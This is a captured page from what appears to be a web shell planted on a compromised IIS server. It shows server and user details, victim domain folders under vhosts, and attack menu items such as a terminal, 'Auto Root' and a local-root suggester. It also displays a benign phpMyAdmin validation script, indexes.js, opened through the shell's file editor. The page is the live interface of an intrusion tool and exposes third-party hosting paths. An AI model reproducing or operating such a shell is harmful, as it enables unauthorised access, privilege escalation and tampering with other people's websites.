Windows NT WIN-Q8QVV26RG2E 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.145.151.153
Domains :
Cant Read [ /etc/named.conf ]
User : IWPD_52(secretsi)
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Inetpub /
vhosts /
mrugeshtrading.com /
purplesoil.com /
2019-10-08-all /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
dom-drag.js
3.77
KB
-rw-rw-rw-
2017-05-25 09:32
easySlider1.5.js
4.48
KB
-rw-rw-rw-
2017-05-25 09:32
functions.js
39.71
KB
-rw-rw-rw-
2017-05-25 09:32
indexes.js
2.42
KB
-rw-rw-rw-
2017-05-25 09:32
jquery-1.3.2.min.js
55.91
KB
-rw-rw-rw-
2017-05-25 09:32
jquery.color.js
3.57
KB
-rw-rw-rw-
2017-05-25 09:32
jquery.cycle.all.min.js
23.17
KB
-rw-rw-rw-
2017-05-25 09:32
jquery.js
55.91
KB
-rw-rw-rw-
2017-05-25 09:32
jquery_tabs.js
5.6
KB
-rw-rw-rw-
2017-05-25 09:32
keyhandler.js
1.65
KB
-rw-rw-rw-
2017-05-25 09:32
querywindow.js
10.01
KB
-rw-rw-rw-
2017-05-25 09:32
server_privileges.js
2.83
KB
-rw-rw-rw-
2017-05-25 09:32
tbl_change.js
10.72
KB
-rw-rw-rw-
2017-05-25 09:32
tooltip.js
5.04
KB
-rw-rw-rw-
2017-05-25 09:32
user_password.js
5.6
KB
-rw-rw-rw-
2017-05-25 09:32
Save
Rename
/* $Id: indexes.js 7886 2005-11-23 19:10:30Z nijel $ */ /** * Ensures a value submitted in a form is numeric and is in a range * * @param object the form * @param string the name of the form field to check * @param integer the minimum authorized value * @param integer the maximum authorized value * * @return boolean whether a valid number has been submitted or not */ function checkFormElementInRange(theForm, theFieldName, message, min, max) { var theField = theForm.elements[theFieldName]; var val = parseInt(theField.value); if (typeof(min) == 'undefined') { min = 0; } if (typeof(max) == 'undefined') { max = Number.MAX_VALUE; } // It's not a number if (isNaN(val)) { theField.select(); alert(errorMsg1); theField.focus(); return false; } // It's a number but it is not between min and max else if (val < min || val > max) { theField.select(); alert(message.replace('%d', val)); theField.focus(); return false; } // It's a valid number else { theField.value = val; } return true; } // end of the 'checkFormElementInRange()' function /** * Ensures indexes names are valid according to their type and, for a primary * key, lock index name to 'PRIMARY' * * @return boolean false if there is no index form, true else */ function checkIndexName() { if (typeof(document.forms['index_frm']) == 'undefined') { return false; } // Gets the elements pointers var the_idx_name = document.forms['index_frm'].elements['index']; var the_idx_type = document.forms['index_frm'].elements['index_type']; // Index is a primary key if (the_idx_type.options[0].value == 'PRIMARY' && the_idx_type.options[0].selected) { document.forms['index_frm'].elements['index'].value = 'PRIMARY'; if (typeof(the_idx_name.disabled) != 'undefined') { document.forms['index_frm'].elements['index'].disabled = true; } } // Other cases else { if (the_idx_name.value == 'PRIMARY') { document.forms['index_frm'].elements['index'].value = ''; } if (typeof(the_idx_name.disabled) != 'undefined') { document.forms['index_frm'].elements['index'].disabled = false; } } return true; } // end of the 'checkIndexName()' function onload = checkIndexName;